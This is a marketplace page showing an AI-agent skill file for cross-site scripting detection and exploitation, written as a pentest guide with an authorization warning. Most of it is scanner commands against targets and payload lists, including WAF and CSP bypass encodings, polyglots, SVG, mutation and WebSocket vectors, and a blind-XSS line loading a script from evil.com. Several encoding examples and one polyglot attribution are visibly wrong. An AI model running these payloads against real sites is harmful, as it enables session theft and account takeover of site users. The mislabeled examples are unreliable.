Run any Skill in Manus with one click

$pwd:

exploit-xss

Name: Exploit Xss
Author: crazyMarky

// Cross-site scripting (XSS) vulnerability detection and exploitation. Supports reflected XSS, stored XSS, DOM-based XSS, and blind XSS testing. Use this skill when user mentions XSS, cross-site scripting, script injection, or needs to test JavaScript injection in parameters, forms, headers, or DOM sources.

Run Skill in Manus

$ git log --oneline --stat

stars:170

forks:16

updated:February 15, 2026 at 04:25

File Explorer

41 files

SKILL.md

readonly

related-skills.json

same repository

pentest-report.md

from "crazyMarky/pentest-skills"

按照标准格式生成渗透测试报告，包含项目信息表、漏洞发现清单、漏洞详情（含属性表、描述、复现步骤、证据截图、修复建议）、附录（风险等级定义、CVSS说明、词汇表）。当用户要求生成渗透测试报告、安全测试报告、漏洞报告时使用此技能。严格遵循项目模板目录中的标准格式。

2026-03-06170

exploit-file-download.md

from "crazyMarky/pentest-skills"

任意文件下载与本地文件包含 (LFI) 漏洞检测和利用工具。使用 curl、ffuf、wget 等工具测试文件下载漏洞，支持路径遍历、伪协议利用、敏感文件读取。当用户需要测试文件下载功能、检测 LFI 漏洞、读取服务器敏感文件时使用此技能。

2026-03-05170

exploit-lfi.md

from "crazyMarky/pentest-skills"

本地文件包含 (LFI) 漏洞检测和利用工具。使用 curl、ffuf 等工具测试 LFI 漏洞，支持路径遍历、PHP 伪协议利用、日志投毒 RCE、敏感文件读取。当用户需要检测 LFI 漏洞、利用文件包含漏洞读取服务器文件时使用此技能。

2026-03-05170

exploit-file-download.md

from "crazyMarky/pentest-skills"

Arbitrary file download vulnerability detection and exploitation using path traversal techniques, bypass methods, and sensitive file discovery. Use this skill when user needs to test for file download vulnerabilities, path traversal, or read sensitive files on target systems.

2026-02-15170

exploit-sqli.md

from "crazyMarky/pentest-skills"

SQL injection detection and exploitation using sqlmap, manual techniques, and custom payloads. Use this skill when user needs to test for SQL injection vulnerabilities, extract database information, or exploit SQLi in parameters, headers, or cookies.

2026-02-15170

recon-dir-scan.md

from "crazyMarky/pentest-skills"

Directory and file enumeration using ffuf, gobuster, dirsearch, and feroxbuster. Use this skill when user needs to discover hidden directories, enumerate files, find backup files, or map application structure through path fuzzing.

2026-02-15170

package.json

"author": "crazyMarky"

"repository": "crazyMarky/pentest-skills"

View GitHub Repository View Creator Repositories

$ install --global

$ download --local

Run Skill in Manus

$ useful --forSOC

Information Security AnalystsComputer and Mathematical Occupations15-1212L4

name	exploit-xss
description	Cross-site scripting (XSS) vulnerability detection and exploitation. Supports reflected XSS, stored XSS, DOM-based XSS, and blind XSS testing. Use this skill when user mentions XSS, cross-site scripting, script injection, or needs to test JavaScript injection in parameters, forms, headers, or DOM sources.

Cross-Site Scripting (XSS) Detection Skill

⚠️ DANGER - Authorization Required

This skill is for AUTHORIZED SECURITY TESTING ONLY.

You must have:

Written permission from the target system owner
Legal authorization to test the target
A defined scope of testing

Unauthorized XSS testing is ILLEGAL and unethical.

Prerequisites

Required Tools

# XSStrike - Advanced XSS scanner with DOM support
pip install xsstrike
# Or: git clone https://github.com/s0md3v/XSStrike

# Dalfox - Fast XSS scanner with pipeline mode
go install github.com/hahwul/dalfox/v2@latest

# XSpear - XSS testing with WAF bypass
gem install xspear

Python Requirements

# Install required Python packages for built-in scripts
pip install requests beautifulsoup4

# Optional: WebSocket XSS testing
pip install websockets

Optional Tools

# Burp Suite for manual testing
# OWASP ZAP for automated scanning

Quick Start

Basic URL Testing

# Test a URL parameter for XSS
python xsstrike.py -u "https://target.com/search?q=test"

# Fast scanning with Dalfox
dalfox url "https://target.com/search?q=test"

POST Request Testing

# Save POST request to file
dalfox file request.txt

# Or use XSStrike
python xsstrike.py -r request.txt

DOM XSS Testing

# DOM XSS with XSStrike
python xsstrike.py -u "https://target.com/page#test" --dom

# DOM XSS with Dalfox
dalfox url "https://target.com/page#test" --dom

Common Scenarios

1. Basic Parameter Testing (Reflected XSS)

Test URL parameters for reflection and injection:

# Single URL testing
python xsstrike.py -u "https://target.com/search?q=test"

# Dalfox for faster scanning
dalfox url "https://target.com/search?q=test"

# Specify parameter
dalfox url "https://target.com/search" -p q

What to check:

Does the input reflect in the HTML response?
What is the context (HTML tag, attribute, JavaScript)?
Are there any filters/encoding applied?

2. POST Request XSS (Form Testing)

Test POST forms for stored/reflected XSS:

# Save request to file first
echo 'POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=test&password=test' > post_request.txt

# Test with XSStrike
python xsstrike.py -r post_request.txt

# Test with Dalfox
dalfox file post_request.txt

Common POST targets:

Login forms (username, email fields)
Contact forms (name, message fields)
Search forms
Comment forms
User profile updates

3. Cookie and Header XSS

Test HTTP headers and cookies for injection:

# Test with custom cookies
python xsstrike.py -u "https://target.com" --cookie "session=test&user=<script>alert(1)</script>"

# Test User-Agent header
python xsstrike.py -u "https://target.com" --user-agent "<script>alert(1)</script>"

# Test Referer header (often reflects in error pages)
python xsstrike.py -u "https://target.com" --referer "https://evil.com/<script>alert(1)</script>"

Headers to test:

User-Agent (check application logs/error pages)
Referer (check 404 pages, analytics)
X-Forwarded-For (check IP reflection)
Cookie (check welcome messages/logs)

4. Reflected XSS Detection

Identify reflection points and test payloads:

# Automated reflection detection
dalfox url "https://target.com/search?q=test" --only-discovery

# Manual reflection analysis
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

# Differential response analysis
python xsstrike.py -u "https://target.com/search?q=test" --blind

Detection techniques:

Compare response length with/without payload
Search for payload in response HTML
Check for encoding/filtering patterns
Identify HTML context (tag, attribute, JS, CSS)

5. Stored XSS Testing (Database Persistence)

Test for XSS that persists in the database:

# Test comment/feedback forms
dalfox file post_request.txt --blind https://your-callback.burpcollaborator.net

# Test user profile fields
python xsstrike.py -r profile_update_request.txt

# Time-based detection for stored XSS
scripts/blind_xss_tester.py --url "https://target.com/contact" --form-data "name=test&email=test@test.com&message=payload"

Stored XSS targets:

User profiles (name, bio, location)
Comments/Reviews
Forum posts
Email/contact forms (admin panel XSS)
File upload metadata

6. DOM XSS Discovery

Find client-side XSS vulnerabilities:

# DOM XSS scanning
python xsstrike.py -u "https://target.com/page#input" --dom

# Dalfox DOM mode
dalfox url "https://target.com/page#input" --dom

# Manual DOM source analysis
scripts/xss_context_analyzer.py --dom "https://target.com/page"

Common DOM sources:

location.hash
location.search
document.cookie
document.referrer
window.name

Common DOM sinks:

innerHTML
document.write()
eval()
location.href
setTimeout() / setInterval()

7. Blind XSS in Forms (Contact/Admin XSS)

Test XSS in forms that execute in admin panels:

# Generate blind XSS payloads with callback
scripts/xss_payload_generator.py --blind --callback "https://your-callback.com"

# Test contact form with blind payload
dalfox file contact_request.txt --blind https://your-callback.burpcollaborator.net

# XSpear blind mode
xspear -u "https://target.com/contact" -d "name=test&message=<script src=https://evil.com/steal.js></script>"

Blind XSS testing tips:

Use unique payloads per test (to identify which parameter is vulnerable)
Use Burp Collaborator or interactsh for callbacks
Test email contact forms (executes when admin opens email)
Test support ticket systems

8. Context-Aware Payloads

Use payloads specific to the injection context:

# Analyze context first
scripts/xss_context_analyzer.py "https://target.com/search?q=test"

# Generate context-specific payloads
scripts/xss_payload_generator.py --context html-attribute
scripts/xss_payload_generator.py --context javascript
scripts/xss_payload_generator.py --context url

Context-specific payloads:

HTML Body/Tag:

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

HTML Attribute:

" onmouseover=alert('XSS')
javascript:alert('XSS')

JavaScript:

';alert('XSS');//
'-alert('XSS')-
</script><script>alert('XSS')</script>

CSS/Style:

</style><script>alert('XSS')</script>
expression(alert('XSS'))

9. WAF Bypass Techniques

Evade Web Application Firewalls:

# Generate WAF bypass payloads
scripts/xss_payload_generator.py --waf-bypass

# Use XSpear with bypass mode
xspear -u "https://target.com/search?q=test" --bypass

# Test various encodings
python xsstrike.py -u "https://target.com/search?q=test" --encode

Bypass techniques:

URL encoding: %3Cscript%3Ealert(1)%3C/script%3E
Double encoding: %253Cscript%253E
Unicode encoding: \u003Cscript\u003E
HTML entities: <script>alert(1)</script>
Case mixing: <ScRiPt>alert(1)</sCrIpT>
Comment injection: <script>alert(1)</script>
Tab/newline injection: <script\t>alert(1)</script>

10. Automated Scanning (Batch Testing)

Scan multiple URLs/parameters:

# Scan from file
dalfox file urls.txt

# Pipe from other tools
cat urls.txt | dalfox pipe

# XSStrike with multiple targets
for url in $(cat urls.txt); do python xsstrike.py -u "$url"; done

# Combine with subdomain enumeration
subfinder example.com | httpx | dalfox pipe

11. Payload Encoding Variations

Test with different encoding schemes:

# URL encode payloads
scripts/xss_payload_generator.py --encode url

# HTML encode
scripts/xss_payload_generator.py --encode html

# Hex encode
scripts/xss_payload_generator.py --encode hex

# Test with XSStrike encoding
python xsstrike.py -u "https://target.com" --encode

Common encodings to test:

Plain: <script>alert(1)</script>
URL encoded: %3Cscript%3Ealert(1)%3C/script%3E
Double URL encoded: %253Cscript%253E
HTML entities: <script>alert(1)</script>
Hex: \x3Cscript\x3Ealert(1)\x3C/script\x3E
Unicode: \u003Cscript\u003Ealert(1)\u003C/script\u003E

12. Polyglot Payloads

Test with payloads that work in multiple contexts:

# Generate polyglot payloads
scripts/xss_payload_generator.py --polyglot

# Common polyglot payload
# Works in: HTML, HTML attribute, JavaScript string, etc.
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

Famous polyglot payloads:

# Ashar Javed's polyglot
%3Cscript%3Ealert(1)%3C/script%3E

# Mathias Karlsson's polyglot
javascript://%250Aalert(1)//%250A?javascript://alert(1)//%0A

# Another polyglot
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

13. CSP Detection and Bypass

Content Security Policy analysis and bypass testing:

# Detect and analyze CSP
python scripts/csp_detector.py https://target.com

# Generate bypass report
python scripts/csp_detector.py https://target.com --bypass

# Full CSP analysis
python scripts/csp_detector.py https://target.com --verbose

Common CSP bypass techniques:

unsafe-inline - allows inline scripts
unsafe-eval - allows eval(), setTimeout()
data: URLs - inline scripts via data URI
Wildcard sources - allows any domain
Nonce-based bypasses
Framework-specific bypasses

See references/csp_bypass_guide.md for detailed techniques.

14. Framework-Specific XSS

Test for Angular, React, Vue, and other framework vulnerabilities:

# Auto-detect frameworks
python scripts/framework_xss_tester.py --url https://target.com --detect

# Test Angular XSS
python scripts/framework_xss_tester.py --url https://target.com --param q --framework angular

# Test React XSS
python scripts/framework_xss_tester.py --url https://target.com --param data --framework react

# Test Vue XSS
python scripts/framework_xss_tester.py --url https://target.com --param content --framework vue

Common framework vectors:

Angular: {{constructor.constructor('alert(1)')()}}
React: dangerouslySetInnerHTML
Vue: v-html directive
jQuery: .html() manipulation

See references/framework_xss_guide.md for detailed techniques.

15. SVG File Upload XSS

Test for SVG-based XSS in file uploads:

# Generate SVG payloads
python scripts/svg_xss_tester.py --generate --variant file_upload

# Test SVG injection
python scripts/svg_xss_tester.py --url https://target.com --param content

# Test SVG file upload
python scripts/svg_xss_tester.py --upload-url https://target.com/upload --file-param avatar

# Create exploit SVG
python scripts/svg_xss_tester.py --save-svg exploit.svg --callback https://your-callback.com

SVG XSS vectors:

<svg onload="alert('XSS')">
<svg><script>alert('XSS')</script></svg>
<svg><foreignObject><iframe src="javascript:alert('XSS')"></iframe></foreignObject></svg>

See references/svg_xss_guide.md for detailed techniques.

16. Mutation XSS (mXSS)

Test for HTML mutation-based XSS:

# Test all mutation types
python scripts/mutation_xss_tester.py --url https://target.com --param q --type all

# Test DOM clobbering
python scripts/mutation_xss_tester.py --url https://target.com --param q --dom-clobber

# Test attribute mutations
python scripts/mutation_xss_tester.py --url https://target.com --param q --attribute

Mutation XSS vectors:

Entity decoding mutations: < → <
Tag parsing mutations: <xmp>, <listing>
DOM clobbering: <a id="location">
Namespace mutations: SVG/MathML

See references/mutation_xss_guide.md for detailed techniques.

17. WebSocket XSS

Test for XSS vulnerabilities in WebSocket connections:

# Scan URL for WebSocket endpoints
python scripts/websocket_xss_tester.py --url https://target.com

# Test specific WebSocket URL
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws

# Test DOM injection via WebSocket
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-dom

# Test stored XSS in WebSocket
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --test-stored

# Test with custom payload
python scripts/websocket_xss_tester.py --ws-url wss://target.com/ws --payload '<script>alert(1)</script>'

WebSocket XSS vectors:

Message reflection: ws.send('<script>alert(1)</script>')
JSON injection: {"message": "<img src=x onerror=alert(1)>"}
Event handler: ws.send('alert(1);')
Attribute breaking: " onmouseover=alert(1)

See references/websocket_xss_guide.md for detailed techniques.

Tool Selection Guide

Scenario	Recommended Tool	Command
Quick parameter testing	Dalfox	`dalfox url "https://target.com?param=test"`
Deep scanning with DOM	XSStrike	`python xsstrike.py -u "URL" --dom`
WAF bypass testing	XSpear	`xspear -u "URL" --bypass`
Stored/Blind XSS	Dalfox + Callback	`dalfox file req.txt --blind CALLBACK`
Manual testing	XSStrike	`python xsstrike.py -r request.txt`
Batch scanning	Dalfox pipe	`cat urls.txt \| dalfox pipe`
CSP Analysis	CSP Detector	`python scripts/csp_detector.py URL`
Framework XSS	Framework Tester	`python scripts/framework_xss_tester.py -u URL -p param`
SVG XSS	SVG Tester	`python scripts/svg_xss_tester.py -u URL -p param`
Mutation XSS	Mutation Tester	`python scripts/mutation_xss_tester.py -u URL -p param`
WebSocket XSS	WebSocket Tester	`python scripts/websocket_xss_tester.py -u URL`
Full Scan	Full Scanner	`python scripts/xss_full_scan.py -u URL --all`

Tool Comparison:

Feature	XSStrike	Dalfox	XSpear	Built-in Scripts
Speed	Medium	Fast	Medium	Varies
DOM XSS	Excellent	Good	Limited	Good
WAF Bypass	Good	Good	Excellent	Good
Pipeline Mode	No	Yes	No	No
Blind XSS	Yes	Yes	Yes	Yes
CSP Analysis	No	No	No	Yes
Framework Testing	No	No	No	Yes
SVG Testing	No	No	No	Yes
Mutation XSS	No	No	No	Yes
WebSocket XSS	No	No	No	Yes

Testing Checklist

Reconnaissance Phase

Identify all input points (URL params, forms, headers, cookies)
Map out application functionality
Identify data storage locations

Reflected XSS Testing

Test all URL parameters
Test all form fields (GET/POST)
Test HTTP headers (UA, Referer, Cookie)
Identify reflection context
Test context-specific payloads

Stored XSS Testing

Test all form submissions
Test file upload metadata
Test user profile fields
Test comments/reviews
Verify persistence across sessions
Test execution in different user contexts

DOM XSS Testing

Identify all DOM sources
Trace data flow to sinks
Test hash-based injections
Test URL parameter-based injections
Test localStorage/sessionStorage

Advanced Testing

Scenario: Persistent Storage of XSS Findings

When you need to persist XSS findings to the database:

# Manual entry after discovering XSS
python .claude/skills/exploit-xss/scripts/xss_storage.py \
  --host-ip 192.168.1.100 \
  --url "https://example.com/search?q=test" \
  --xss-type reflected \
  --payload "<script>alert(1)</script>" \
  --context html_body \
  --severity High \
  --subsystem "Web Application"

Parameters:

--host-ip - Target host IP (required)
--url - Vulnerable URL (required)
--xss-type - XSS type: reflected, stored, or dom (required)
--payload - Payload used (required)
--context - XSS context: html_body, html_attribute, javascript, dom, url (default: html_body)
--severity - Severity level (default: Medium)
--subsystem - Subsystem name (optional)
--parameter - Vulnerable parameter name
--title - Vulnerability title (auto-generated if not specified)
--description - Vulnerability description
--cvss-score - CVSS score (0.0-10.0)

Database location: ./data/results.db

Related skills: results-storage - Query data, generate reports

Resources

Scripts

scripts/xss_payload_generator.py - Generate XSS payloads for various contexts
scripts/xss_tester.py - Automated XSS testing framework
scripts/xss_context_analyzer.py - Analyze injection context
scripts/blind_xss_tester.py - Test stored/blind XSS
scripts/csp_detector.py - CSP analysis and bypass testing
scripts/svg_xss_tester.py - SVG file upload XSS testing
scripts/framework_xss_tester.py - Angular/React/Vue XSS testing
scripts/mutation_xss_tester.py - Mutation XSS/DOM clobbering testing
scripts/websocket_xss_tester.py - WebSocket XSS testing
scripts/mxss_detector.py - HTML parser mutation XSS detection
scripts/xss_full_scan.py - Integrated XSS testing automation

Reference Documentation

references/dalfox_guide.md - Dalfox complete guide
references/xsstrike_guide.md - XSStrike complete guide
references/xspear_guide.md - XSpear complete guide
references/xss_payload_techniques.md - XSS payload techniques
references/dom_xss_guide.md - DOM XSS testing guide
references/csp_bypass_guide.md - CSP bypass techniques
references/framework_xss_guide.md - Framework-specific XSS guide
references/svg_xss_guide.md - SVG XSS testing guide
references/mutation_xss_guide.md - Mutation XSS/DOM clobbering guide
references/websocket_xss_guide.md - WebSocket XSS testing guide

Assets/Wordlists

assets/common_xss_payloads.txt - Basic XSS payloads
assets/attribute_xss_payloads.txt - Attribute context payloads
assets/dom_xss_payloads.txt - DOM XSS payloads
assets/blind_xss_payloads.txt - Blind XSS with callbacks
assets/polyglot_xss_payloads.txt - Multi-context payloads
assets/waf_bypass_payloads.txt - WAF evasion payloads
assets/csp_bypass_payloads.txt - CSP bypass payloads
assets/framework_xss_payloads.txt - Angular/React/Vue payloads
assets/svg_xss_payloads.txt - SVG XSS payloads
assets/mutation_xss_payloads.txt - Mutation XSS payloads
assets/websocket_xss_payloads.txt - WebSocket XSS payloads

External Resources

Common Responses & Troubleshooting

"No XSS found"

Try different payload encodings
Test with DOM scanner enabled
Check if there's a WAF blocking
Test with blind XSS payloads
Verify the parameter actually reflects

"Payload is reflected but not executing"

Analyze the context using context analyzer
Use context-specific payloads
Check for CSP (Content Security Policy)
Check for input sanitization
Try alternative tags/event handlers

"403 / WAF blocked"

Use WAF bypass payloads
Try different encoding methods
Use XSpear with --bypass flag
Test with smaller payloads first
Try alternative injection points

Reporting Format

When reporting XSS vulnerabilities, include:

╔═══════════════════════════════════════════════════════╗
║              XSS Vulnerability Report                 ║
╠═══════════════════════════════════════════════════════╣
║ Target: https://target.com/search                     ║
║ Type: Reflected XSS                                   ║
║ Severity: High                                        ║
╚═══════════════════════════════════════════════════════╝

Vulnerable Parameter: q
Injection Context: HTML attribute (value)
Payload: " onmouseover=alert('XSS')

Proof of Concept:
https://target.com/search?q=%22%20onmouseover%3Dalert('XSS')

Impact:
- Execute arbitrary JavaScript in victim's browser
- Steal session cookies
- Perform actions on behalf of victim
- Deface website

Recommendations:
- Implement proper output encoding
- Use Content Security Policy (CSP)
- Validate and sanitize all input
- Use framework-provided escaping functions

exploit-xss

More from this repository

More from this repository

Cross-Site Scripting (XSS) Detection Skill

⚠️ DANGER - Authorization Required

Prerequisites

Required Tools

Python Requirements

Optional Tools

Quick Start

Basic URL Testing

POST Request Testing

DOM XSS Testing

Common Scenarios

1. Basic Parameter Testing (Reflected XSS)

2. POST Request XSS (Form Testing)

3. Cookie and Header XSS

4. Reflected XSS Detection

5. Stored XSS Testing (Database Persistence)

6. DOM XSS Discovery

7. Blind XSS in Forms (Contact/Admin XSS)

8. Context-Aware Payloads

9. WAF Bypass Techniques

10. Automated Scanning (Batch Testing)

11. Payload Encoding Variations

12. Polyglot Payloads

13. CSP Detection and Bypass

14. Framework-Specific XSS

15. SVG File Upload XSS

16. Mutation XSS (mXSS)

17. WebSocket XSS

Tool Selection Guide

Testing Checklist

Reconnaissance Phase

Reflected XSS Testing

Stored XSS Testing

DOM XSS Testing

Advanced Testing

Scenario: Persistent Storage of XSS Findings

Resources

Scripts

Reference Documentation

Assets/Wordlists

External Resources

Common Responses & Troubleshooting

"No XSS found"

"Payload is reflected but not executing"

"403 / WAF blocked"

Reporting Format

Cross-Site Scripting (XSS) Detection Skill

⚠️ DANGER - Authorization Required

Prerequisites

Required Tools

Python Requirements

Optional Tools

Quick Start

Basic URL Testing

POST Request Testing

DOM XSS Testing

Common Scenarios

1. Basic Parameter Testing (Reflected XSS)

2. POST Request XSS (Form Testing)

3. Cookie and Header XSS

4. Reflected XSS Detection

5. Stored XSS Testing (Database Persistence)

6. DOM XSS Discovery

7. Blind XSS in Forms (Contact/Admin XSS)

8. Context-Aware Payloads

9. WAF Bypass Techniques

10. Automated Scanning (Batch Testing)

11. Payload Encoding Variations

12. Polyglot Payloads

13. CSP Detection and Bypass

14. Framework-Specific XSS

15. SVG File Upload XSS

16. Mutation XSS (mXSS)

17. WebSocket XSS

Tool Selection Guide

Testing Checklist

Reconnaissance Phase